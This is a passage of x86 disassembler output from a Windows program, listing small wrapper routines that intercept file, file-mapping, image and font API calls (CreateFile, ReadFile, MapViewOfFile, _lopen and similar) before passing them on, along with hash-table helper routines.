sub_4DB18D proc near ; CODE XREF: sub_40767D+170�p
; DATA XREF: _1:off_4220B4�o ...
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEAE0
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
push [ebp+arg_0]
call ds:dword_4E16E0 ; FreeLibrary
jmp short loc_4DB1D9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 1
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
loc_4DB1D9: ; CODE XREF: sub_4DB18D+35�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4DB18D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB1EA proc near ; DATA XREF: _6:off_4E13D8�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
mov eax, [ebp+arg_14]
and eax, 10h
test eax, eax
jz short loc_4DB216
cmp [ebp+arg_8], 0
jnz short loc_4DB216
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
call sub_4CF036
test eax, eax
jnz short loc_4DB216
and [ebp+var_4], 0
loc_4DB216: ; CODE XREF: sub_4DB1EA+10�j
; sub_4DB1EA+16�j ...
cmp [ebp+var_4], 0
jnz short loc_4DB237
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E17CC ; LoadImageA
mov [ebp+var_4], eax
loc_4DB237: ; CODE XREF: sub_4DB1EA+30�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_4DB1EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB23E proc near ; DATA XREF: _6:off_4E13C8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset dword_4DE5C4
push offset aAddfontresou_0 ; "AddFontResourceA"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4CF94C
test eax, eax
jnz short loc_4DB270
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_4DB270: ; CODE XREF: sub_4DB23E+27�j
mov eax, [ebp+var_4]
leave
retn 4
sub_4DB23E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB277 proc near ; DATA XREF: _6:004E13D0�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset dword_4DE5C4
push offset aRemovefontre_0 ; "RemoveFontResourceA"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4CFD24
test eax, eax
jnz short loc_4DB2A9
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_4DB2A9: ; CODE XREF: sub_4DB277+27�j
mov eax, [ebp+var_4]
leave
retn 4
sub_4DB277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB2B0 proc near ; CODE XREF: sub_404716+1CB�p
; sub_405053+25�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_14]
and eax, 40000000h
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D0346
test eax, eax
jnz short loc_4DB2F7
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E16A8 ; CreateFileA
mov [ebp+var_4], eax
loc_4DB2F7: ; CODE XREF: sub_4DB2B0+27�j
mov eax, [ebp+var_4]
leave
retn 1Ch
sub_4DB2B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB2FE proc near ; DATA XREF: _6:004E1260�o
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
; FUNCTION CHUNK AT 004DB3C1 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEAF0
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
and [ebp+var_20], 0
or [ebp+var_1C], 0FFFFFFFFh
and [ebp+var_4], 0
push 104h
call sub_4D835A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_20], eax
xor eax, eax
mov edi, [ebp+var_20]
stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4E17B8 ; WideCharToMultiByte
mov [ebp+var_24], eax
cmp [ebp+var_24], 103h
ja short loc_4DB388
push 0
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_10]
push [ebp+arg_4]
push [ebp+var_20]
call sub_4D0346
test eax, eax
jnz short loc_4DB3A6
loc_4DB388: ; CODE XREF: sub_4DB2FE+70�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E16AC ; CreateFileW
mov [ebp+var_1C], eax
loc_4DB3A6: ; CODE XREF: sub_4DB2FE+88�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4DB3B1
jmp short loc_4DB3C1
sub_4DB2FE endp
; =============== S U B R O U T I N E =======================================
sub_4DB3B1 proc near ; CODE XREF: sub_4DB2FE+AC�p
; DATA XREF: _5:004DEAF8�o
mov eax, [ebp-20h]
mov [ebp-2Ch], eax
push dword ptr [ebp-2Ch]
call sub_4D83DD
pop ecx
retn
sub_4DB3B1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DB2FE
loc_4DB3C1: ; CODE XREF: sub_4DB2FE+B1�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 1Ch
; END OF FUNCTION CHUNK FOR sub_4DB2FE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB3D5 proc near ; CODE XREF: sub_404716+202�p
; sub_405053+B2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4D0741
test eax, eax
jnz short loc_4DB3F5
push [ebp+arg_0]
call ds:dword_4E16A4 ; CloseHandle
mov [ebp+var_4], eax
loc_4DB3F5: ; CODE XREF: sub_4DB3D5+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_4DB3D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB3FC proc near ; CODE XREF: sub_405053+80�p
; sub_409A5D+BB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D1177
test eax, eax
jnz short loc_4DB436
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E177C ; ReadFile
mov [ebp+var_4], eax
jmp short loc_4DB459
; ---------------------------------------------------------------------------
loc_4DB436: ; CODE XREF: sub_4DB3FC+1E�j
cmp [ebp+arg_10], 0
jz short loc_4DB459
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz short loc_4DB459
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_4DB459
mov eax, [ebp+arg_10]
push dword ptr [eax+10h]
call ds:dword_4E1784 ; SetEvent
loc_4DB459: ; CODE XREF: sub_4DB3FC+38�j
; sub_4DB3FC+3E�j ...
mov eax, [ebp+var_4]
leave
retn 14h
sub_4DB3FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB460 proc near ; CODE XREF: sub_405053+6C�p
; sub_40AB26+259�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D0421
test eax, eax
jnz short loc_4DB491
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E1788 ; SetFilePointer
mov [ebp+var_4], eax
jmp short loc_4DB49D
; ---------------------------------------------------------------------------
loc_4DB491: ; CODE XREF: sub_4DB460+18�j
cmp [ebp+arg_8], 0
jz short loc_4DB49D
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
loc_4DB49D: ; CODE XREF: sub_4DB460+2F�j
; sub_4DB460+35�j
mov eax, [ebp+var_4]
leave
retn 10h
sub_4DB460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB4A4 proc near ; CODE XREF: sub_409140+25�p
; DATA XREF: _1:off_4220F8�o ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_4DB4BE
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4D0216
test eax, eax
jnz short loc_4DB4D9
loc_4DB4BE: ; CODE XREF: sub_4DB4A4+8�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E16B0 ; CreateFileMappingA
mov [ebp+var_4], eax
loc_4DB4D9: ; CODE XREF: sub_4DB4A4+18�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_4DB4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB4E0 proc near ; DATA XREF: _6:004E12B0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_4DB4FA
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4D0216
test eax, eax
jnz short loc_4DB515
loc_4DB4FA: ; CODE XREF: sub_4DB4E0+8�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E16B4 ; CreateFileMappingW
mov [ebp+var_4], eax
loc_4DB515: ; CODE XREF: sub_4DB4E0+18�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_4DB4E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB51C proc near ; CODE XREF: sub_409140+36�p
; DATA XREF: _1:off_4220F4�o ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4CFFBF
test eax, eax
jnz short loc_4DB554
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E176C ; MapViewOfFile
mov [ebp+var_4], eax
loc_4DB554: ; CODE XREF: sub_4DB51C+1E�j
mov eax, [ebp+var_4]
leave
retn 14h
sub_4DB51C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB55B proc near ; CODE XREF: sub_409140+69�p
; DATA XREF: _1:off_4220F0�o ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4CFECD
test eax, eax
jnz short loc_4DB57B
push [ebp+arg_0]
call ds:dword_4E17A0 ; UnmapViewOfFile
mov [ebp+var_4], eax
loc_4DB57B: ; CODE XREF: sub_4DB55B+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_4DB55B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB582 proc near ; DATA XREF: _6:004E1328�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0
push [ebp+arg_0]
call sub_4D0346
test eax, eax
jz short loc_4DB610
cmp [ebp+arg_4], 0
jz short loc_4DB60B
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, 88h
jnz short loc_4DB60B
mov eax, [ebp+arg_4]
mov byte ptr [eax+1], 1
mov eax, [ebp+arg_4]
and word ptr [eax+2], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
cmp [ebp+var_8], 7Fh
jnb short loc_4DB5E0
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
jmp short loc_4DB5E7
; ---------------------------------------------------------------------------
loc_4DB5E0: ; CODE XREF: sub_4DB582+54�j
mov [ebp+var_10], 7Fh
loc_4DB5E7: ; CODE XREF: sub_4DB582+5C�j
mov ecx, [ebp+var_10]
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
add edi, 8
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_4]
and byte ptr [eax+87h], 0
loc_4DB60B: ; CODE XREF: sub_4DB582+22�j
; sub_4DB582+2F�j
mov eax, [ebp+var_4]
jmp short loc_4DB630
; ---------------------------------------------------------------------------
loc_4DB610: ; CODE XREF: sub_4DB582+1C�j
push offset dword_4DE5B4
push offset aOpenfile ; "OpenFile"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_C]
loc_4DB630: ; CODE XREF: sub_4DB582+8C�j
pop edi
pop esi
leave
retn 0Ch
sub_4DB582 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB636 proc near ; DATA XREF: _6:004E1330�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0
push [ebp+arg_0]
call sub_4D0346
test eax, eax
jz short loc_4DB656
mov eax, [ebp+var_4]
jmp short locret_4DB673
; ---------------------------------------------------------------------------
loc_4DB656: ; CODE XREF: sub_4DB636+19�j
push offset dword_4DE5B4
push offset a_lopen ; "_lopen"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
locret_4DB673: ; CODE XREF: sub_4DB636+1E�j
leave
retn 8
sub_4DB636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB677 proc near ; DATA XREF: _6:004E1338�o
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
movzx eax, ds:byte_4E60E4
and eax, 1
test eax, eax
jnz short loc_4DB6AB
mov al, ds:byte_4E60E4
or al, 1
mov ds:byte_4E60E4, al
push offset dword_4DE5B4
push offset a_lclose ; "_lclose"
call sub_4D9C22
pop ecx
pop ecx
mov ds:dword_4E60E0, eax
loc_4DB6AB: ; CODE XREF: sub_4DB677+10�j
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4D0741
test eax, eax
jnz short loc_4DB6C6
push [ebp+arg_0]
call ds:dword_4E60E0
jmp short locret_4DB6C8
; ---------------------------------------------------------------------------
loc_4DB6C6: ; CODE XREF: sub_4DB677+42�j
xor eax, eax
locret_4DB6C8: ; CODE XREF: sub_4DB677+4D�j
leave
retn 4
sub_4DB677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB6CC proc near ; DATA XREF: _6:004E1348�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D0421
test eax, eax
jnz short loc_4DB70A
push offset dword_4DE5B4
push offset a_llseek ; "_llseek"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_4DB70A: ; CODE XREF: sub_4DB6CC+19�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_4DB6CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB711 proc near ; DATA XREF: _6:004E1340�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4D1177
test eax, eax
jnz short loc_4DB763
push offset dword_4DE5B4
push offset a_lread ; "_lread"
call sub_4D9C22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_C]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4DB763
mov [ebp+var_4], 1
loc_4DB763: ; CODE XREF: sub_4DB711+20�j
; sub_4DB711+49�j
cmp [ebp+var_4], 0
jnz short loc_4DB76F
or [ebp+var_10], 0FFFFFFFFh
jmp short loc_4DB775
; ---------------------------------------------------------------------------
loc_4DB76F: ; CODE XREF: sub_4DB711+56�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
loc_4DB775: ; CODE XREF: sub_4DB711+5C�j
mov eax, [ebp+var_10]
leave
retn 0Ch
sub_4DB711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB77C proc near ; CODE XREF: sub_4D2DD0+6C7�p
; sub_4D2DD0+70D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_8]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_0]
shl eax, 2
push eax
call sub_4D835A
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov eax, [ebp+var_8]
add eax, 10h
push eax
call ds:dword_4E174C ; InitializeCriticalSection
mov eax, [ebp+var_8]
leave
retn 4
sub_4DB77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB7C0 proc near ; CODE XREF: sub_4DB82A+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
and [ebp+var_4], 0
jmp short loc_4DB7D6
; ---------------------------------------------------------------------------
loc_4DB7CF: ; CODE XREF: sub_4DB7C0:loc_4DB824�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4DB7D6: ; CODE XREF: sub_4DB7C0+D�j
mov eax, [ebp+var_14]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short locret_4DB826
mov eax, [ebp+var_14]
mov eax, [eax+8]
mov ecx, [ebp+var_4]
mov eax, [eax+ecx*4]
mov [ebp+var_8], eax
loc_4DB7EF: ; CODE XREF: sub_4DB7C0+62�j
cmp [ebp+var_8], 0
jz short loc_4DB824
cmp [ebp+arg_0], 0
jz short loc_4DB804
mov eax, [ebp+var_8]
push dword ptr [eax]
call [ebp+arg_0]
pop ecx
loc_4DB804: ; CODE XREF: sub_4DB7C0+39�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_8], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4D83DD
pop ecx
jmp short loc_4DB7EF
; ---------------------------------------------------------------------------
loc_4DB824: ; CODE XREF: sub_4DB7C0+33�j
jmp short loc_4DB7CF
; ---------------------------------------------------------------------------
locret_4DB826: ; CODE XREF: sub_4DB7C0+1E�j
leave
retn 4
sub_4DB7C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB82A proc near ; CODE XREF: sub_4D5070+51�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
push 0
mov ecx, [ebp+var_8]
call sub_4DB7C0
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_4], eax
push [ebp+var_4]
call sub_4D83DD
pop ecx
mov eax, [ebp+var_8]
add eax, 10h
push eax
call ds:dword_4E1750 ; RtlDeleteCriticalSection
leave
retn
sub_4DB82A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB85D proc near ; DATA XREF: sub_4DB871+C�o
; sub_4DB8E0+C�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp eax, [ebp+arg_4]
setnz cl
mov eax, ecx
pop ebp
retn 8
sub_4DB85D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB871 proc near ; CODE XREF: sub_4CF036+94�p
; sub_4CF6DE+63�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_4DBAFE
push offset sub_4DB85D
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_4DB891
leave
retn 4
sub_4DB871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB891 proc near ; CODE XREF: sub_4D58CF+20�p
; sub_4DB871+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_8]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov ecx, [ecx+8]
mov eax, [ecx+eax*4]
mov [ebp+var_4], eax
loc_4DB8B2: ; CODE XREF: sub_4DB891+47�j
cmp [ebp+var_4], 0
jz short loc_4DB8DA
push [ebp+arg_0]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call [ebp+arg_4]
test eax, eax
jnz short loc_4DB8CF
mov eax, [ebp+var_4]
mov eax, [eax]
jmp short locret_4DB8DC
; ---------------------------------------------------------------------------
loc_4DB8CF: ; CODE XREF: sub_4DB891+35�j
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_4DB8B2
; ---------------------------------------------------------------------------
loc_4DB8DA: ; CODE XREF: sub_4DB891+25�j
xor eax, eax
locret_4DB8DC: ; CODE XREF: sub_4DB891+3C�j
leave
retn 0Ch
sub_4DB891 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB8E0 proc near ; CODE XREF: sub_4CF818+93�p
; sub_4CFD24+106�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_4DBAFE
push offset sub_4DB85D
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_4DB900
leave
retn 4
sub_4DB8E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB900 proc near ; CODE XREF: sub_4D5FCD+F1�p
; sub_4DB8E0+17�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], ecx
mov eax, [ebp+var_18]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_8]
pop ecx
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_18]
mov eax, [eax+8]
mov ecx, [ebp+var_C]
mov eax, [eax+ecx*4]
mov [ebp+var_8], eax
mov eax, [ebp+var_18]
mov eax, [eax+8]
mov ecx, [ebp+var_C]
lea eax, [eax+ecx*4]
mov [ebp+var_4], eax
loc_4DB937: ; CODE XREF: sub_4DB900+86�j
cmp [ebp+var_8], 0
jz short loc_4DB988
push [ebp+arg_0]
mov eax, [ebp+var_8]
push dword ptr [eax+4]
call [ebp+arg_4]
test eax, eax
jnz short loc_4DB974
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov ecx, [ecx+8]
mov [eax], ecx
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
push [ebp+var_14]
call sub_4D83DD
pop ecx
mov eax, [ebp+var_10]
jmp short locret_4DB98A
; ---------------------------------------------------------------------------
loc_4DB974: ; CODE XREF: sub_4DB900+4B�j
mov eax, [ebp+var_8]
add eax, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
mov [ebp+var_8], eax
jmp short loc_4DB937
; ---------------------------------------------------------------------------
loc_4DB988: ; CODE XREF: sub_4DB900+3B�j
xor eax, eax
locret_4DB98A: ; CODE XREF: sub_4DB900+72�j
leave
retn 0Ch
sub_4DB900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB98E proc near ; CODE XREF: sub_4CC000+3E�p
; sub_4D0216+D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push offset sub_4DBAFE
push offset sub_4DB85D
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_4DB9B1
leave
retn 8
sub_4DB98E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB9B1 proc near ; CODE XREF: sub_4D5BD7+204�p
; sub_4DB98E+1A�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push edi
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
push dword ptr [eax]
push [ebp+arg_0]
call [ebp+arg_C]
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_8]
mov eax, [eax+ecx*4]
mov [ebp+var_4], eax
loc_4DB9DA: ; CODE XREF: sub_4DB9B1+52�j
cmp [ebp+var_4], 0
jz short loc_4DBA05
push [ebp+arg_0]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call [ebp+arg_8]
test eax, eax
jnz short loc_4DB9FA
